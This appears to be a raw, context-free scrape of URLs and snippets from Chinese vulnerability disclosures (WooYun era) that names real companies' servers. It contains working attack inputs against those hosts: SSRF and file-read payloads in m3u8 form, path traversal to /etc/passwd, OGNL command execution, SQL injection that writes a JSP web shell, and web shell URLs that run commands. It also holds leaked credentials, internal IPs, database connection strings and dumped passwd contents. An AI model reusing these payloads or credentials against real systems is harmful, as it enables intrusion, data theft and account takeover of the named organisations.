http://www.iqiyi.com/u/editor/ EXTINF:10.0 concat:http://115browser.com/mp4/remote.m3u8 http://opm.netease.com encap:Ethernet e6:ca:a8 addr:10.63.5.30 Bcast:10.63.5.255 Mask:255.255.255.0 MTU:1500 packets:65462274 packets:9647067 txqueuelen:1000 EXTINF:10.0 concat:http://pictest.66ae2b.dnslog.info|file:///proc/sys/kernel/hostname http://bbs.163.com/user http://ffp.shenzhenair.com/ffp/À®/WEB-INF/modules/struts-config-codingShare.xml EXTINF:10.0 concat:http://aaa00e.dnslog.info 
http://vku.sdo.com/proxy.php?name=1&pwd=11&src_url=file:///etc/passwd http://esms.cs-air.com/main/UserManager-esmsLogin.action http://**.**.**.**/ http://**.**.**.**/webservice/services/webservice?wsdl http://yunying.yupaopao.cn/home/nim http://yunying.yupaopao.cn/home/nim http://121.40.188.99/admin/index#rechargeList www.huaweihcc.com www.huaweihcc.com http://180.97.104.136:8001/ http://180.97.104.136:8001/is/index.jsp http://um.mama.cn/passport/wapindex/findPassword/),如图所示: http://api.xiaokaxiu.com/common/api/upload_headface jdbc:oracle:thin:@**.**.**.**:1521:YWXT2 jdbc:oracle:thin:@**.**.**.**:1521:ORCL http://www.zcool.com.cn/ http://**.**.**.**:7001/defaultroot/UploadServlet http://**.**.**.**:7001/defaultroot/upload/test/123459/1234592.jspx?cmd=dir http://zone.wooyun.org/content/27086,https://www.ffmpeg.org/ffmpeg-protocols.html#subfile EXTINF:10.0 concat:http://test.com/header.m3u8|file:///etc/passwd http://test1.com/ http://test1.com/的web日志中可查看读取的文件内容,在这里我使用了hawkeye平台的Web访问日志查询功能可方便查看结果: file:///etc/passwd只能查看到第一行内容,好像是遇到换行符时,换行符之后的文件内容不再返回(实践证明确实如此),但是可以使用subfile分段读取文件,因此修改之后的vdisk.avi内容如下: EXTINF:10.0 concat:http://test.com/header.m3u8|subfile,,start,30,end,120,,:///etc/passwd http://**.**.**.**/services/uddi/inquiryapi!IBM|http://**.**.**.**/services/uddi/v2beta/inquiryapi!IBM http://**.**.**.**/inquire!Microsoft| http://58.83.214.128:8888/admin/login/?next=/admin/ http://203.187.184.7/mty/logon.jsp http://203.187.184.7/mty/sadtlquery.do?id=1638174&supplyid=5355&supplyname=%B0%B2%BB%D5%CA%A1%D2%BD%D2%A9%A3%A8%BC%AF%CD%C5%A3%A9%B9%C9%B7%DD%D3%D0%CF%DE%B9%AB%CB%BE jdbc:oracle:thin:@**.**.**.**:1521:jsws http://122.119.74.149/ceagent/front/regist/agency-regist!doFillInfo.shtml http://122.119.74.149 http://v.163.com/paike/y3/upload EXTINF:10.0 concat:http://aaa.com/header.m3u8|file:///etc/passwd http://aaa.com/header.m3u8为你自己的web服务器上的文件 http://aaa.com http://106.39.162.14:80/ http://106.39.162.14/test/index.jsp http://61.145.111.17:8001/index 
http://bbs.wan.58.com http://115.182.92.226/zabbix/ http://115.182.92.226/zabbix/synthtisme_report.php?sid=6490833fb62bd800&business=not+selected&module=all&local=all&groups=ALLHOSTS&tag=&hosts=&bgndate=2015-01-06&enddate=2016-05-07&sel=shixu&load15=system.cpu.load%5B%2Cavg15%5D&avg15_sel1=max&avg15_sel2=%3E%3D&avg15_sel3=0&single_load=system.cpu.load.single&singleload_sel1=max&singleload_sel2=%3E%3D&singleload_sel3=0&cpu_util=system.cpu.util%5B%2Cidle%2Cavg1%5D&cpu_sel1=max&cpu_sel2=%3E%3D&cpu_sel3=0&pswpin=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpin%2C2%5D&pswpin_sel1=max&pswpin_sel2=%3E%3D&pswpin_sel3=0&pswpout=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpout%2C2%5D&pswpout_sel1=max&pswpout_sel2=%3E%3D&pswpout_sel3=0&swap_use=system.swap.size%5B%2Cpused%5D&swap_sel1=max&swap_sel2=%3E%3D&swap_sel3=0&readio=readio&rio=vfs.dev.read%5Bsda%2Cops%5D&rio_sel1=max&rio_sel2=%3E%3D&rio_sel3=0&writeio=writeio%3E&wio=vfs.dev.write%5Bsda%2Cops%5D&wio_sel1=max&wio_sel2=%3E%3D&wio_sel3=0&tr_in=tr_in&trin_sel1=max&trin_sel2=%3E%3D&trin_sel3=0&tr_out=tr_out&trout_sel1=max&trout_sel2=%3E%3D&trout_sel3=0&packets_in=packets_in&packetsin_sel1=max&packetsin_sel2=%3E%3D&packetsin_sel3=0&packets_out=packets_out&packetsout_sel1=max&packetsout_sel2=%3E%3D&packetsout_sel3=0&go=%E6%9F%A5%E8%AF%A2 http://14.152.92.77:8080/admin/adminLogin.action http://218.241.156.10:7001/jtbx http://**.**.**.**/bugs/wooyun-2010-0204620 http://**.**.**.**:5118/softac/login.jsp http://yfpt.csc.com.cn:8080/km/login.dhtml主要包括两个漏洞 http://mapsrch.house.sina.com.cn:8081/gss/simple?encode=utf-8&srctype=POI&number=10&batch=1&range=3000&resType=json&retvalue=1&key=16a4150d21aaee9be07ce960b867f37003afd183c8306ae139ac98f432932286151dc0ec55580eca'&sid=1002&cenX=116.314553&cenY=39.820966&keyword=&rid=74248 http://121.14.19.23:9001/ http://121.14.19.23:9001/bea_wls_internal/test.jsp http://webmap1.map.bdimg.com/maps/services/thumbnails?width=215&height=145&quality=120&align=middle,middle&src=http://101.200.**.**:8081 
http://ht.52xinyou.cn/xykj/login.aspx http://www.xueyazhushou.com/info/infocontent.php?info_id http://yfpt.csc.com.cn:8080/km/login.dhtml www.xueyazhushou.com http://www.xueyazhushou.com/api/upload.php www.xueyazhushou.com http://www.guoyaoyaocai.com/ http://oa.guoyaoyaocai.com/seeyon//logs/login.log http://58.16.64.31/index.action jdbc:oracle:thin:@**.**.**.**:1521:tyxzsp http://oa.my089.cn:7001/defaultroot/Logon!logon.action jdbc:oracle:thin:@**.**.**.**:1521:epaydb http://supports.house.sina.com.cn/bbs/img.php?w=140&h=105&m=1&url=http://img2.3lian.com/img2007/19/33/005.jpg http://supports.house.sina.com.cn/bbs/img.php?w=140&h=105&m=1&url=http://101.200.**.**/out.jpg&dpc=1 http://shortgroup.foresealife.com/echannel/forgetPassword/ http://shortgroup.foresealife.com/echannel/uum/member/resetPassword/NDI1NTg=/activate/d9728895e2ffa0aa024f92d43da5868e http://shortgroup.foresealife.com/echannel/uum/member/resetPassword/NDI4NDk=/activate/76fb8f481cd887e83ffb43494d510f7a http://shortgroup.foresealife.com/echannel/uum/member/resetPassword/NDI1NTg%3D/activate/76fb8f481cd887e83ffb43494d510f7a.json http://shortgroup.foresealife.com http://wooyun.org/bugs/wooyun-2010-0178883 http://125.88.171.12:8008/ http://125.88.171.12:8008//plugins/weathermap/configs/ceshi.php http://120.55.144.142/projects(注:之前未授权可访问)但重要系统配置还是泄漏了。 http://ebooking.elong.com/ebkauth/forgotpwd http://117.135.159.4:8888/ https://eb.ceair.com https://eb.ceair.com/uploadimages/ http://eb.ceair.com/Appeal/Admin/Login.aspx https://vpn.ehomepay.com.cn http://**.**.**.**/page/show.aspx?id=966 http://**.**.**.**/page/login.aspx http://mm.manhuadao.cn/admin/ http://115.182.70.165:8060/login_login.action http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp http://op.esf.sina.com.cn/login http://101.227.68.197:9981/ http://feature.mtime.com/mobile/ http://**.**.**/GetHotelListAction!initc.do 
http://**.**.**/GetHotelListAction!initc.doredirect%3A%24%7B%23res%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23res.setCharacterEncoding%28%22UTF-8%22%29%2C%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22echo%22%2C%22Test http://**.**.**/12580.jsppwd=0324&i=cat%20/etc/ssh/ssh_config_ http://**.**.**/12580.jsppwd=0324&i=cat%20/etc/passwd_ root:/***** bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** sbin:/***** wn:/sbin:/s***** sbin:/***** uucp:/***** tor:/root:/***** gopher:/***** ftp:/s***** body:/:/s***** bus:/:/***** owner:/d***** abrt:/sb***** daemon:/:/***** ntp:/sbi***** ck:/var/run/avahi-***** User:/var/lib***** User:/var/li***** SSH:/var/empty***** OProfile:/***** www:/***** http://**.**.**/12580.jsppwd=0324&i=ifconfig http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** http://cmbt.cn/QUQMe39Fg7a10sjM https://pbdw.ebank.cmbchina.com/cbmchart/servlet/H5Servlet?clientid=9Fg7a10sjM&prjNbr=72609 http://cmbt.cn/njVmvJ9FnBu10sNM https://pbdw.ebank.cmbchina.com/cbmchart/servlet/H5Servlet?clientid=9FnBu10sNM&prjNbr=72608 http://miaosha.shenzhenair.com http://miaosha.shenzhenair.com/%c0%ae/WEB-INF/web.xml http://www.ahai.com.cn/ https://zhaopin.wanda.cn/loginindex.do http://task.www.sogou.com/ http://120.24.218.210/admin1218.rar http://cloud.vpclub.cn/Login.aspx?returnUrl=http%3a%2f%2fcloud.vpclub.cn%2f https://aws.amazon.com/cn/elasticbeanstalk/ http://images.baidu.com/search/down?tn=download&ipn=dwnl&word=download&ie=utf8&fr=result&url=http://family.baidu.com/favicon.ico?.jpg http://list.image.baidu.com/n/similar?queryImageUrl=http://ssrf.*****.dnslog.info/&querySign=1217191529%2C1914405054&t=1448426252884&pn=210&rn=100&fr=pc 
http://list.image.baidu.com/pictureup/uploadshitu?rt=0&stt=0&filename=CasterPy&tn=shituresultpc&uptype=paste&rn=10&ftn=wantu&objurl=http://ssrf.*****.dnslog.info/&fm=index&ct=1 http://www.chinawutong.com/ashx/infomationAppraise.ashx http://**.**.**/bugs/wooyun-2016-0185504_ http://**.**.**/_ http://**.**.**/script_ http://beehiveweibo.zteict.com/ admin:111111 https://113.140.11.212:8080 http://**.**.**.**/si/portal/loginPortal.jsp http://**.**.**.**/server/spreq/attachment!download.action?attachFileId=801100014456&ticket=08D85582CDC51979AC0A30B72167655C&domain=si http://foundation.zte.com.cn/phpsso_server/caches/configs/database.php~ http://foundation.zte.com.cn/phpsso_server/caches/configs/system.php~ http://foundation.zte.com.cn/caches/configs/database.php~ http://foundation.zte.com.cn/caches/configs/system.php~ http://ie.sogou.com/ http://ie.sogou.com/skins/index.php?route=theme/theme/getRelatedThemes&tid=52975&tag=70,11743,11950 http://183.224.86.211:82/public/outLogin.action http://brandzone.youku.com/article/-1%22%20or%201=1%20and%20%221%22=%221 http://brandzone.youku.com/article/-1%22%20or%201=2%20and%20%221%22=%221 http://apps.ceair.com下载掌上东航APP http://www.xinnet.com/WEB-INF/classes/modules/spring.xml http://www.xinnet.com/WEB-INF/web.xml jdbc:mysql://172.20.16.200:3306/info_pub jdbc:oracle:thin:@172.20.20.231:1521:xinnetdb jdbc:oracle:thin:@172.20.21.2:1521:xinnet2 http://mall.1hai.cn/admin/default.html http://crashreport.yy.duowan.com/crashreport/dev_version.php?pkey= https://github.com/liuhaiween/devopsjumpserver/blob/ccb9acb139d83fc80aaf6ef4e5082bbb3690839f/jumpserver/settings.py encap:Ethernet addr:43.230.89.253 Bcast:43.230.89.255 Mask:255.255.255.192 fe0e:8f6c/64 Scope:Link MTU:1500 packets:1456692317 packets:1488521521 txqueuelen:1000 http://lms.midea.com/module-portalweb/portalweb/view/index.shtml https://lms.midea.com/module-portalweb/portalweb/components/tangram/combo/popwin/query.shtml?cfgKey=bankInformation 
https://lms.midea.com/module-portalweb/portalweb/view/supplier/EbSupplierEdit.shtml https://**.**.**.**/wenhaiwen/flaskr/blob/785c9338fe2ebcd37cd82c6a7ed320614dcdb7b9/hello.py http://us.ceair.com/muovc/newsitefront/order/order!viewOrderAfterPay.shtml?ordNo=16030571358 http://121.14.4.144:8080/ http://123.59.124.137/ http://123.59.124.138/ http://118.213.246.48:7001/ http://118.213.246.48:7001/bea_wls_internal/1.jsp jdbc:oracle:thin:@138.138.2.123:1521:ZXBS http://admin.i.house.sina.com.cn/index.php?mod=login http://manage.kefu.**.**.**.**:8002/mobileservice/doLogin.html http://58.20.232.155:82/OpenPage/Login.aspx http://www.annto.com/DownView.Asp?ID=3 http://202.104.30.115:22222/msd_ad/phone/login.action http://**.**.**.**/ http://**.**.**.**/manager/login.php http://**.**.**.**/manager/contract/index.php http://**.**.**.**/manager/contract/contract_modify.php?id=311 http://**.**.**.**/wechat/WechatService_queryWechats.action http://**.**.**.**/admin/ http://**.**.**.**/web.rar http://116.236.239.109/chip/ResetPass.aspx http://admin.super.leju.com/ http://a6.gykghn.com:8080/yyoa/index.jsp http://oa.sinopharm-fj.com:8080/yyoa http://oa.gykgnmg.com/yyoa http://a6.gykghn.com:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex%28%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27%29%20%20into%20outfile%20%27D:/UFseeyon/OA/tomcat/webapps/yyoa/sky123.jsp%27 http://**.**.**.**/webSite/Search.aspx?k=123 http://116.236.239.109/index.aspx http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=42&uid=ed83a60cea765d52e3c2ced557270c62&vn=1&channel=A33003001&sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&stoken==R1fTz7EJBVCutv3iFzOUFg&cellid=cdma_13844_19857_2&sc=0 
http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=42&uid=ed83a60cea765d52e3c2ced557270c62&vn=1%27%20union%20select%201111111111111,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20--%20-&channel=A33003001&sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&stoken==R1fTz7EJBVCutv3iFzOUFg&cellid=cdma_13844_19857_2&sc=0 http://lexue.yonyou.com http://218.76.215.23:8082/gzcx/ http://**.**.**.**/portal/index.jsp http://**.**.**.**/project/list.do?action=queryById&fage=2&id=1%27 https://**.**.**.**/demo.htm http://admin.weixin.leju.com/?site=web&ctl=login&act=index http://**.**.**.**/content/27104 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8399 http://**.**.**.** https://**.**.**.**//spaces/viewdefaultdecorator.action?decoratorName=file:///home/confluence/.bash_history http://123.57.44.206:8989/isc_sso/login http://123.57.44.206:8001/bea_wls_internal/1.jsp jdbc:oracle:thin:@123.57.44.206:1521:sogrid http://120.24.220.113/ http://120.24.220.113/bea_wls_internal/2.jsp http://tms2.yihaodian.com/system/login_login.action?redirect:http://admin.soso.com http://3pl.yihaodian.com/system/login_login.action?redirect:http://10.187.10.218 https://github.com/jackyliusohu/msohucmdb/blob/4b624e2b3068ec08e72c08d55a08f6ac15ef6cbb/msohucmdb/settings.py https://github.com/lizhengdong/TestAppInstance/blob/cf8fddb1a7f18f730394947b4dd58fd4491c3b11/TestAppInstanceJar/mailInfo.properties baodou.baofeng.com/welcome/doexchange/ http://180.76.183.98/ http://180.76.183.131 http://116.236.229.44:8001/ http://**.**.** http://116.236.229.44:8001/bea_wls_internal/2.jsp jdbc:oracle:thin:@192.168.2.99:1521:CRMREP1 http://android.myapp.com/myapp/detail.htm?apkName=cn.yupaopao.crop cn.yupaopao.crop/shared_prefs/logininfo_preferences.xml http://**.**.**.**//hwx/wxrp.aspx?tp=Health_relative_report.aspx&studyid=${客户体检编号}&Tc=130001 http://mobojoy.baidu.com/dev/ 
http://mobojoy.baidu.com/dev/?r=Member/forgetPasswordReset/email/我是邮箱马赛克/token/4573357947746199b72b9a1663176bad http://mobojoy.baidu.com/affiliate/?r=Member/forgetPasswordReset/email/我是邮箱马赛克/token/d6fa5adea5c42c29e64cef32442cdaa0 http://open.weibo.com/wiki/Weibo-JS_V2#JS_widget.E8.AF.B4.E6.98.8E.E5.8F.8A.E7.A4.BA.E4.BE.8B http://tjs.sjs.sinajs.cn/open/api/js/wb.js?appkey=YOUR%20APPKEY&debug=true https://api.weibo.com/oauth2/authorize?client_id=3063806388 http://weibo.com http://zzgq.hnair.com/frontend/ticketChange/ticketChange_toTicketChange.action http://zzgq.hnair.com/tang/passwd http://zzgq.hnair.com/tang/hosts http://zzgq.hnair.com/tang/group root:x:0 bin:x:1:bin,daemon daemon:x:2:bin,daemon sys:x:3:bin,adm adm:x:4:adm,daemon tty:x:5 disk:x:6 lp:x:7:daemon mem:x:8 kmem:x:9 wheel:x:10 mail:x:12:mail,postfix uucp:x:14 man:x:15 games:x:20 gopher:x:30 video:x:39 dip:x:40 ftp:x:50 lock:x:54 audio:x:63 nobody:x:99 users:x:100 floppy:x:19 vcsa:x:69 utmp:x:22 utempter:x:35 cdrom:x:11 tape:x:33 dialout:x:18 saslauth:x:76 postdrop:x:90 postfix:x:89 fuse:x:499 sshd:x:74 jd:x:501 pn:x:502 gs:x:504 resc:x:505 dt:x:506 ntp:x:38 rpc:x:32 rpcuser:x:29 nfsnobody:x:65534 nagios:x:507 logsee:x:508 sysadm:x:800 usr01:x:801 tcpdump:x:72 nscd:x:28 ldap:x:55 td-agent:x:498 gsbak:x:3002 pnbak:x:3003 apollo:x:3005 mobser:x:3006 ota:x:3007 memcached:x:497 y8:x:3008 hadoop:x:3009 www.mosh.cn http://**.**.**.**/webBuyAction.do;jsessionid=CCC49BF21E4CFF1E399687470B91E04E?action=topSearch http://www.bftv.com/ http://wap.g.baofeng.com http://wap.g.baofeng.com/Index/gethotgame?platform=1 http://cafe.baidu.com/ http://cafe.baidu.com/ajax/users/query?_=1462959192871×tamp=&limit=50&spaceId=1&q=@ http://cafe.baidu.com//issue/history/detail/1 http://**.**.**/weixin/khfwController.dogoIndex&openId=oMAmUjlbJIiy4fJ7xtZ2k9NgLL-I http://b2a.airkunming.com/module/hyfw/forget_passwordHr.jsp http://61.145.111.17:8001/bea_wls_diagnostics/jsp.jsp http://172.16.12.41:80 http://172.16.12.50:80 
http://172.16.12.49:80 http://172.16.12.43:8081 http://172.16.12.52:8080 http://172.16.12.53:8080 http://172.16.12.59:8081 http://172.16.12.60:80 http://172.16.12.73:8080 http://172.16.12.74:8081 http://172.16.12.74:8080 http://172.16.12.78:80 http://172.16.12.79:80 http://172.16.12.83:8080 http://172.16.12.85:8088 http://172.16.12.88:8080 http://172.16.12.90:8088 http://172.16.12.59:8080 http://172.16.12.114:8080 http://172.16.12.115:8080 http://172.16.12.118:8088 http://172.16.12.129:80 http://**.**.**.**/cloudmail/ http://**.**.**.**/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://121.40.223.69:8028/.git/config http://www.xiaoshuxiong.com/ http://www.xiaoshuxiong.com/mobile/category.php?act=cat_goods&cat_id=1 ip.che168.com/ip.che168.com.zip https://www.hnagroup.net/prx/000/http/vpnweb.hnair.com/Default.aspx http://service.eking-tech.com/hnaAct/getBackPwd http://10.2.1.241/Frameset/login.html https://www.hnagroup.net/prx/000/http/vpnweb.hnair.com/Default.aspx获取验证码后,验证码在返回的包中了, http://zichan.damai.cn:88/ http://zichan.damai.cn:88/login.do http://zichan.damai.cn:88 http://bisbj.unibankmedia.com/login.aspx http://bisbj.unibankmedia.com/WebResource.axd?d=WCX_nB4YLXQ_q3tyr6GjWMG6nOw2fLPWD_z9RtbqqpQ1&t=633750802290014532 http://corp.56.com/extman/cgi/index.cgi http://beebox-admin.183gz.com.cn/ http://**.**.**.**/bugs/wooyun-2010-086444),经过修复,虽然已有的漏修复了,但还存在其他问题。 http://**.**.**.**/的问题已经修复,但是该机器的8080端口也可以对外访问到,访问地址为http://**.**.**.**:8080/,网站框架为JBOSS框架,存在命令执行漏洞,且为管理员权限。 administrator:Zjlib2056,用该密码对其他机器进行测试时,又发现其他11台机器使用相同的密码,如下所示: http://**.**.**.**/home/zy_home.jsp) http://**.**.**.**/home/zy_home.jsp)这个网站上共发现多个内网机器的真实IP内网地址,如下: http://bdpp.leju.com/manage.php?a=login http://api.yichemall.com/carsource/ycapi/getecpricenew?callback=jQuery1112010467815725132823_1462273401473&carId=116848&cityName=北京&_=1462273401474 http://**.**.**.**/bugs/wooyun-2015-0142711 
http://content.2500city.com/ucenter/user/login AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 http://www.11185gz.com.cn的邮政票务上注册一个帐号 http://**.**.**.**/defaultroot/UploadServlet http://**.**.**.**/defaultroot/upload/test/123458/123458.jspx?cmd=netstat http://content.2500city.com/Json?relatedOrder=7&platform http://content.2500city.com/Json?platform=2&deviceId=864 http://ume3.umetrip.com/razor-master/cobub/index.php?/ums/postClientData http://202.98.157.30/LoginOn.aspx http://data.auto.sina.com.cn/car/api/car_detail/car_api_new.php?callback=jQuery17208639282449148595_1463050806467&carid=25180,23528,21542&_=1463050806866 http://download.android.bizhi.sogou.com/client.php AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 http://**.**.**.**:7001/uddiexplorer/ss.jsp jdbc:oracle:thin:@//**.**.**.**:1521/xszs http://101.227.240.109:8989/baf/jsp/uiframe/login.jsp http://check.biz.icms.ifeng.com/admin/?_a=1 http://api.app.zeze.com/3.0.8/index.php?a=index&area=%E5%9C%A8%E5%8D%8E%E5%8D%97%E7%90%86%E5%B7%A5%E5%A4%A7%E5%AD%A6%E5%8C%97%E5%8C%BA%E9%99%84%E8%BF%91&authcode=MzQ0N2ZiMTljYzc2ZDY5NzQyZTdlOWRiYTA1NTcxMzZhMjA3Y2NlMDRhMDVkOGQ0&brand=QiKU&c=my&city=%E5%B9%BF%E5%B7%9E%E5%B8%82&cpu=mt6753&density=480&deviceid=867556021834224&district=%E5%A4%A9%E6%B2%B3%E5%8C%BA&locale=cn&location=23.168901%2C113.346539&model=8681-A01&page=1&pagesize=15&qikeversion=3.0.8&showuid=2351679&sign=5901506e1fc7424cc6164f98e75bab56&source=qike&street=%E4%B8%9C%E8%8E%9E%E5%BA%84%E8%B7%AF&sysversion=22&uid=4032877&versionCode=308 http://www.epicc.com.cn/ecargo/ http://admin.pay.sina.com/phpmyadmin/ http://pic4.semir.com/index.aspx http://pic4.semir.com/show.aspx?filepath=1&type=1 index.php/Contacts/add http://social.all-wifi.cn http://**.**.**.**/ http://**.**.**.**:8081/cloudadmin_new/goLogin/proxyUser.action http://61.164.160.11/plugins/weathermap/configs/test.php 
http://training.fang.com/ http://**.**.**.**/news.php?contentid=2369 http://**.**.**.**/news.php?contentid=2436 http://**.**.**.**/news.php?contentid=2370 http://**.**.**.**/news.php?contentid=2243 admin.php/Index/index.html http://**.**.**.**/ http://**.**.**.** http://**.**.**.**:8008/ http://**.**.**.**/是中国移动的NGCA运维管理平台 https://www.zhihu.com/people/flowerains ff40306600c4871484ba18475bcd6b68:7a0445 http://**.**.**.**/ http://222.66.163.130/ http://222.66.163.130:8001/bea_wls_internal/test.jsp jdbc:oracle:thin:@172.18.2.10:1521/HRDB http://**.**.**.**/bugs/wooyun-2010-0206169 http://**.**.**.**/bugs/wooyun-2010-0204620 jdbc:oracle:thin:@**.**.**.**:1521:bims pass:123456 http://220.181.26.165/jenkins/ http://220.181.26.165/jenkins/job/video_audit_info/ws/pom.xml/*view*/ http://220.181.26.165/jenkins/job/GoLang-56-synchronize-vrs/ws/pom.xml/*view*/ http://220.181.26.165/jenkins/job/admin_tv_cleanCache/ws/clean_admin_cache.iml/*view*/ http://220.181.26.165/jenkins/job/admin_tv_cleanCache/ws/pom.xml http://220.181.26.165/jenkins/job/admin_tv/ws/crossdomain.xml http://zone.wooyun.org/content/27104 http://220.181.26.165/wiki/spaces/viewdefaultdecorator.action?decoratorName= http://220.181.26.165/wiki/spaces/viewdefaultdecorator.action?decoratorName=../../ http://220.181.26.165/wiki/spaces/viewdefaultdecorator.action?decoratorName=file:///opt/atlassian/data http://**.**.**.**/themes/mskin/login/login.jsp http://**.**.**.**/components/fck/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://g.19e.cn/login/index.jsp www.treebear.cn http://www.treebear.cn http://61.151.246.245/ http://119.29.155.184:88/product/ http://biz.meichai.in http://member.fangchan.com/users/create http://weixin.ltchina.com/show/iamstar http://www.kugou.com/kf/kf/app/upload.php http://www.kugou.com/kf/kf/app/upload.php http://www.kugou.com/kf/kf/app/upload/1463241818.php http://zp.hongta.com/HRWEB/hr/recruitInfoParentAction/getNotices 
http://fankui.help.sogou.com/index.php/web/web/index?type=6 index.php/web/web/addShenSu http://fankui.help.sogou.com http://misc.intra.leju.com/mantis/view.php?id=81920 https://svn.intra.leju.com/leju/data.leju.com http://wooyun.org/bugs/wooyun-2016-0205007 www.kongzhong.com https://safe.spriteapp.com/ guowei:123456 http://**.**.**.**/cgi-bin/main/About https://**.**.**.**/ http://pages.tom.com/make/manage.php http://pages.tom.com/make/manage.php http://180.96.17.120:8000 http://**.**.**/bea_wls_internal/2.jsp jdbc:mysql://127.0.0.1:3306/cev5500?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull http://m.hongta.com/ http://m.hongta.com/shell/shel.jsp jdbc:oracle:thin:@**.**.**.**:1521:shxt jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcltt jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@localhost:1521:orcltt url:http://mail.transfar.com/ http://mail.transfar.com/tmw/7/mailmain?type=pm http://123.126.48.10:80/memadmin/index.php http://**.**.**.**/bugs/wooyun-2010-0184488 http://**.**.**.** http://**.**.**.**/fwzx/wooyun.jsp http://**.**.**.**/login.jhtml https://**.**.**.**/grootzhao/groot/blob/c36a7f3ba2885c24a681b65c8bdf1c2c11f40749/base-web/src/main/resources/log4j.properties http://**.**.**.**/zxsale-sys2/login.action http://**.**.**.**/zxsale-sys2/bak.jsp http://**.**.**.**/zxsale-sys2/aa.jsp http://**.**.**.**/doLogin.do http://broker2.esf.leju.com/login?client_citycode=bj http://m.xib.com.cn/data_detail.php?id=4 http://m.xib.com.cn/data.php?m=1 ldap://**.**.** http://**.**.**/user/penghl/184_ http://**.**.**/CMS/LoginBlue.aspx_ https://**.**.**/user/requireLoginlang=en_US_ http://**.**.**.**/BaseInfo/UnitRecruitPlan.aspx?cyear=2015 http://pmo.pm.netease.com/ezfaq/show?id=redmine-system-builder&faq_id=43 http://dm.mail.163.com/anonymous/userList/scan?mailUserFile=/../../../../etc/passwd 
http://dm.mail.163.com/anonymous/userList/downloadOKList?tempFileName=/../../../../etc/passwd http://kwbbs.kuwo.cn/kwforum.tar http://**.**.**/ http://go.sogou.com/ http://go.sogou.com/ApiForWeather.php?city=%E5%8C%97%E4%BA%AC http://211.147.239.102:8089/ admin:admin http://www.weiba66.com:80/ http://builder.iguokr.com/#/signin http://**.**.** http://**.**.**/containers/json t.highpin.cn/m/c3Wec t.highpin.cn/m/c3Wec,就自动登录该账号 tcp://121.41.33.174:2375 com:5001/qtcontent/python-graphviz:0.1 python:3.5 sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin http://117.121.54.92:8015/etc/passwd http://117.121.54.92:8015/etc/shadow http://117.121.54.92:8015/root/.bash_history http://drops.wooyun.org/papers/1151 http://drops.wooyun.org/papers/1377 https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&contactEmail=123@163.com http://123.127.198.90/mslife_wx/managerLogin.jsp http://123.127.198.90/f/index.jsp http://ishangche.net/staff/toExamine http://ishangche.net/jsp/common/main.jsp?realName=%E9%AA%86%E9%A3%9E&&userName=luofei# http://ishangche.net/staff/toExamine http://**.**.**/ http://**.**.**/user/liuhy6/configure_ http://**.**.**/user/guohong/configure_ http://117.121.97.3:9080/view/dmp/job/dmp-console/ws/target/classes/application.properties/*view*/ classpath:insite ame:dmp_co***** Name:net.sf.l***** le:8085/monitor/mai***** phoenix:d***** http://180.76.161.55:2375 tcp://180.76.161.55:2375 registry.bae.bj.baidubce.com/public/ubuntu12.04_web_php5.5:6653-91 encap:Ethernet df:68:95:78 addr:172.17.0.1 Bcast:0.0.0.0 Mask:255.255.0.0 dfff:fe68:9578/64 Scope:Link MTU:1500 packets:933462 packets:889024 http://**.**.**.**/regUserAction.action cyq:123456 fmq:123456 gxy:123456 hds:123456 ltq:123456 nwc:123456 pss:123456 wsj:123456 yjx:123456 http://e.s.weibo.com/sa/public/index.php/blogpro/index?uid=5&mid=3974282985712490 http://help.qijiapay.com http://139.196.36.217/.svn/entries http://pt.ztgame.com/ 
